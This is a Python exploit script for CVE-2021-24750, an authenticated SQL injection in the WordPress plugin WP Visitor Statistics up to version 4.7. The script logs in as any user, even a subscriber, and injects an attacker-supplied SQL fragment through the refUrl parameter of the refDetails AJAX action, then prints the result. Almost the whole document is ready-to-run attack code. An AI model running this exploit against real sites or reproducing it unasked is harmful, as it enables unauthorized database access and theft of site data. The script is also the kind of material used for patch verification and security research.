# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection # Date 22/12/2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.plugins-market.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip # Version: <= 4.7 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24750 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md ''' Description: The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks ''' # Banner: banner = ''' ___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___ / __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \ ( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) ) \___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/ [+] WP Visitor Statistics SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse import requests from datetime import datetime # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) my_parser.add_argument('-C', '--COMMAND', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD command = args.COMMAND print('') print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('') # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # Exploit: exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}' exploit = session.get(exploit_url) print(exploit.text) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))